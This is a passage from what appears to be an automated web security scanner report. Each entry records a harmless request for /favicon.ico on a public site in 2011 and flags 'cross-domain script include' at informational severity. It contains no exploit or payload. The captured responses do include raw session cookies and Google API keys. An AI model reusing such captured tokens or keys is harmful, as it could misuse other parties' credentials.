Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
</title>

<script src="http://maps.google.com/maps?file=api&v=2&sensor=false&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sfgdata=+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+a" type="text/javascript"></script>
...[SNIP]...

20.26. http://www.lanebryant.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanebryant.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lanebryant.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 60807
Date: Sat, 02 Apr 2011 13:30:58 GMT
Connection: close

<!DOCTYPE html>
<html lang="en">
   <head>
        <link rel="shortcut icon" type="image/x-icon" href="http://www.lanebryant.com/assets/lb/assets/favicon.ico" />

<title>Lane Bryant | Lane Bryant</t
...[SNIP]...
</script><script type="text/javascript" src="http://cts.channelintelligence.com/49058906_landing.js"></script>
...[SNIP]...

20.27. http://www.life123.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.life123.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: wz_cu=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: accepting=1; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: user=l=dir; Domain=.life123.com; Path=/
Content-Length: 58228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Articles and Answers ab
...[SNIP]...
</script><script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

20.28. http://www.menupages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.menupages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Sat, 02 Apr 2011 13:56:11 GMT
Server: Apache
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:01:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 7920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</script>
    <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Cross Pixel Tracking -->
    <script src="http://209.15.236.80/allwebhosts/menupagescom/script.js" ></script>
...[SNIP]...

20.29. http://www.moshimonsters.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moshimonsters.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moshimonsters.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: Apache
Last-Modified: Fri, 26 Nov 2010 16:33:06 GMT
ETag: "63e24e-15ef-495f746e95480"-gzip
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive
Content-Length: 5615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta htt
...[SNIP]...
<link rel="shortcut icon" href="http://c.mmcdn.net/static/favicon.png" type="image/x-icon" />
       <script src="http://c.mmcdn.net/versioned/2.23.23/scripts/diablo.js" type="text/javascript"></script>
       <script src="http://c.mmcdn.net/versioned/2.23.23/scripts/engine.js" type="text/javascript"></script>
       <script src="http://c.mmcdn.net/versioned/2.23.23/scripts/swfobject.js" type="text/javascript"></script>
...[SNIP]...

20.30. http://www.mrmovietimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrmovietimes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrmovietimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: ci_session=Pxo%2Fmkc72zw34uGdKefBnTKWnI38vNFuRHZJuWHotgoLiVrWO%2FyS899sVleGDTCa2378J5LwcCx%2FaM3Iu6M9HYM1xNRYhzFD8lxZ46O%2FJ3nwd%2Bvpqrqxx8ftRXSPpmIZDPqJkuft4RfzDbKrA3W82BkFflF8ybcM%2FTTixeL%2Fm%2BrTiDc1eW64DbHWf7ZnUmfNoFYMH%2BNTVkfhzkAj2mnYk68GgXolGs5rItNsbvL1XJxkWq%2FGEKnjXX56nfFb6lHe9BXx0QjVxoyJwfdyq3S0xD7ZfsUzCE4qQl274NwudSsM4sTm5AG5seWG0rEVYqrOX%2BCvbs2RFaiYsOIBYd2tnOcF97iCBmuNqYstGLS9GEo40ZwueXnzLFJSNDQcN3ISMGspPD5cP4Kfiwg7241ktJS%2FoTY4QjL2IHI7fkO0V%2BwELgecc8ERNofDzFzXSuRysvQFytx2y9uu%2BDIejUxyv%2FE6%2B2F4WOFRzPCZHSAXt%2B63j%2FCewbA0HsBZEss7%2F6Xa1IUqt2VF7NLwawkOAm3xJ4j1%2FQPUWHVYJBcl%2BNiisNRgBE%2FLifcI4vGUK6XJbMHrKlkEqCc0Zl%2BJhc1sxp%2FFyKjXbYkb9chz3mP7lmJZHvX8ocsN%2F7Bxrkppf9uyWGrz; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Set-Cookie: locationData=O%3A8%3A%22stdClass%22%3A7%3A%7Bs%3A8%3A%22distance%22%3Bs%3A2%3A%2210%22%3Bs%3A4%3A%22city%22%3BN%3Bs%3A6%3A%22region%22%3BN%3Bs%3A12%3A%22country_code%22%3Bs%3A2%3A%22US%22%3Bs%3A8%3A%22latitude%22%3BN%3Bs%3A9%3A%22longitude%22%3BN%3Bs%3A11%3A%22postal_code%22%3Bs%3A0%3A%22%22%3B%7D; expires=Tue, 30-Mar-2021 14:00:53 GMT; path=/; domain=www.mrmovietimes.com
Set-Cookie: ci_session=BzKboyaJvMSktBeg3pLApmo%2BFi1zrsIVFwSxCPNsxsvMPhZVvVzgu9X6lsdhW6alBUOEFALoOzSWv1gnDLoPPwFI8HHbpddijnLl0f9V1hlJB8y3IxU21tCjPeSPQG4tJ0glFKgdxfty3Sw%2BTMl07BrDpKmlRLjs1cUDtYV%2Bec5pujiLNDKpgdo%2BfD2U2gAxqEntoeEWVNmKXJTJMkeTMjPmZEb7Cw0YHMzACi%2BEZWp7TeahJchMLtAUWr%2BKXhf%2BtfUPpz1Zl%2BvAiNYrsUsMQ1EZHpnW%2BAxq%2BiKZrw7W6014Qrk3yEakON6A445N3w%2FjQNi%2Bbml48X%2B9qkmm1vxaP7pUVZvbL1IUxldnQeCL7CNQqnTyo%2FTCzfnwzEMxkdeK85JfLbLluvLqfhB%2BhLSwhGjVuEMU1KteyLvEmkqPno%2Fht0BU%2FMBs3lVRhJIY5ac2N97zssEY8yACf1CangjgtXAa2KJxkoMFNA079kwj6cJYhCno20FBv8NJ2tdQu36LPzEO1Ye3WsfXedxcQrqIJV6JDwo%2FdsGpuRlqivbBcNLy3tqknO6QATPXaUddfy1calDlp4VxbPYokP0tqreyJiqpDZYuB6Wucxq02VGZKUz2k%2B4e5w2oIZMZxtGt%2B6lpV4OXoVCifK9YpMBxZi0fYe8kIjqT%2B0LFHAr8lxofuhJGCYVDne7%2FrH908Z5Zt%2FeNetYGgoWgTeZlX9d8QPfFwIl99hPNAFlJono6Rio3H4Bi%2FcoKpFcI7foxh4o%2B5Wd2WYvc%2Bfnnhy9cptgpTSQKztlFTaxP%2FREWWwmdhUEijT0JtxX7UrQMKXwG2k3LhiZTgTH6bNpVpkqSSFK3Og1NA2pDRoDXMhTdFsLIj08ox%2BXj88zSIhMZ5fWKKoPH%2FyqWPJlJyugj3x54W3ptgasZZB7ZdGnVfuakUJnYGKrXlTYLkF5suXHLaKMqXqvdzQwH8xMwhxSVIVhkHodESV0ZyGWaWTrrCtyNp2TvVeJXZdQt8J8Noyf4ZnaYHXAqBtAHF%2Fj2U0RwwfkHcUu3M85m6sWhfp4XNaFIZ6Qz%2Fg1Ij%2BRj9bdLXlnzV4u7EZgiVRDWMKGZdW5DbqbcuP4E7LNoRUzrVMKfwDc%2FU6KJLb3C8FI4ssXohIT4LUHPb7xEE9bS; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10698

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

...[SNIP]...
</script>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<!---->    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

20.31. http://www.myrecipes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
ETag: "437b78-39-49e76a4611d00"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Content-Length: 24220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Page Not Found |
...[SNIP]...
<![endif]-->
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<!-- /div.footer -->
   <script type="text/javascript" language="javascript" src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
<!-- Quantcast Tag START -->
   <script type='text/javascript' src='http://edge.quantserve.com/quant.js'></script>
...[SNIP]...

20.32. http://www.newport-news.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newport-news.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newport-news.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 43506
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Sat, 02 Apr 2011 13:56:03 GMT
Connection: close


<HTML>
<HEAD>
   <title>Error</title>
   <link rel="stylesheet" type="text/css" href="css/styles.css">
</HEAD>
<body style="padding:0; margin:0;">
<!-- BEGIN FORM -->

<link rel="shortcut
...[SNIP]...
<td align="right" style="height:30px;"><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.33. http://www.onemanga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onemanga.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onemanga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 14:06:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: geo_code="178.190.152.95:AT:Austria"; expires=Sun, 03-Apr-2011 14:01:56 GMT; Max-Age=86400; Path=/
Vary: Accept-Encoding
Content-Length: 5622
Age: 291
X-Cache: HIT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<link rel="shortcut icon" href="http://static.s-onemanga.com/manga/favicon3.ico" type="image/x-icon" />
   
<script type="text/javascript" src="http://content.s-onemanga.com/lookup-items.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://content.s-onemanga.com/announcement.js"></script>
...[SNIP]...
<input type="hidden" id="urlStatic" value="http://static.s-onemanga.com" />
<script type="text/javascript" src="http://static.s-onemanga.com/manga/search-autocomplete.js"></script>
...[SNIP]...

20.34. http://www.pga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pga.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:43 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:52:43 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 22957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="ht
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://i2.cdn.turner.com/dr/pga/sites/default/files/js/js_a9b28c0ff012bae216dab4bacabcf1fa.js"></script>
...[SNIP]...
<div class="content">
<script src="http://js.revsci.net/gateway/gw.js?csid=A09801"></script>
...[SNIP]...
<img src="http://gdyn.pga.com/1.1/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)" />
<script type="text/javascript" language="JavaScript1.1" src="http://ar.atwola.com/file/adsEnd.js"></script>
...[SNIP]...
<div class="content">
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/7621/nodetag.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/pga/.element/ssi/js/1.5/global/omniture/jsmd.js"></script>
...[SNIP]...

20.35. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       
       
       <script type="text/javascript" src="http://www.mywebface.com/toolbar/toolbar-v2.2-mws.js"></script>
...[SNIP]...
</script>

       
                                                       <script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak.imgfarm.com/images/anx/anemone.js"></script>
...[SNIP]...

20.36. http://www.skype.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.skype.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
X-Handler: 404.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 33298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

20.37. http://www.suntimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suntimes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suntimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:44 GMT
Server: Apache/2.2.3 (Red Hat)
set-cookie: CSPSESSIONID-SP-80-UP-=000000010000487voeTq000000unSIZmK6gJ43n8m0PT_7Iw--; path=/;
cache-control: no-cache
expires: Thu, 29 Oct 1998 17:04:19 GMT
pragma: no-cache
csp-transfer-encoding: chunked
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: SUNT=SUNT_ECP9; path=/
Content-Length: 127640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...
</script>
   <script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...

20.38. http://www.tasteofhome.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tasteofhome.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tasteofhome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_headTag"><
...[SNIP]...
</script>
       <script type="text/javascript" language="javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...
<span id="ctl00_ctl03_ConditionalSslContent2"><SCRIPT SRC="http://an.tacoda.net/an/18189/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- End SiteCatalyst code version: H.2. -->


<script src="http://content.dl-rms.com/rms/mother/20844/nodetag.js"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.2. -->


<script src="http://content.dl-rms.com/rms/mother/20844/nodetag.js"></script>
...[SNIP]...

20.39. http://www.teennick.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teennick.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teennick.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 24746
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 14:18:01 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/
Vary: User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Error | Nick.com</title><meta content="" name="description"
...[SNIP]...
</script><script src="http://www.nick.com/global/scripts/overture/sponsored_links_lib.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
<![endif]-->        

   <script src="http://www.nick.com/sbcom/data/kca/okca.jhtml?event=KCA_2011"></script>
...[SNIP]...
<div class="clearfix" id="pageContainer"><script id="90C3FFFF01E323B00002FFFFC390" type="text/javascript" src="http://widgets3.flux.com/Loader" language="javascript"></script>
...[SNIP]...
</div><script src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/1911.js" type="text/javascript"/></body>
...[SNIP]...

20.40. http://www.ufc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufc.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ufc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:06:03 GMT
Content-Length: 54772
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<link rel="shortcut icon" href="http://video.ufc.tv/ufc_system_assets_20110330/images/favicon.ico" />    
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
   <script type="text/javascript" src="https://www.google.com/jsapi?key=ABQIAAAAjw0NXZjCYSfX-ePxoHZLsxSIEFQBKGYGKFcMDzFKHr0vJ-O27hTPSjFKO_IX_9zgd5Qcy9--VQZtTA"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
   <script type="text/javascript" src="http://cufon.shoqolate.com/js/cufon-yui.js"></script>

   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/ITC_Franklin_Gothic.js"></script>

   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery/jquery.jcarousel.min.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery.ufcButtons.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery.mainMenu.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery.searchBox.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/startup.js"></script>
...[SNIP]...
<link rel='stylesheet' type='text/css' href='http://video.ufc.tv/ufc_system_assets_20110330/plugins/grails-ui-1.1.1/js/grailsui/../../css/grailsui/grails-ui.css'/>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/yahoo-dom-event/yahoo-dom-event.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/plugins/grails-ui-1.1.1/js/grailsui/grailsui.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/datasource/datasource-min.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/connection/connection-min.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/autocomplete/autocomplete-min.js" ></script>
...[SNIP]...

20.41. http://www.usa.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa.gov
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usa.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:06:11 GMT
Content-Length: 19734
Connection: close

<!DOCTYPE html>

           <html lang="en" xml:lang="en">
   
<head>
    <title>USA.gov Website: Error Page</title>

   <meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8" />
           <meta name="
...[SNIP]...
<link rel="accessibility" href="/About/Important_Notices.shtml#a11y" />
       
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...

20.42. http://www.usajobs.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
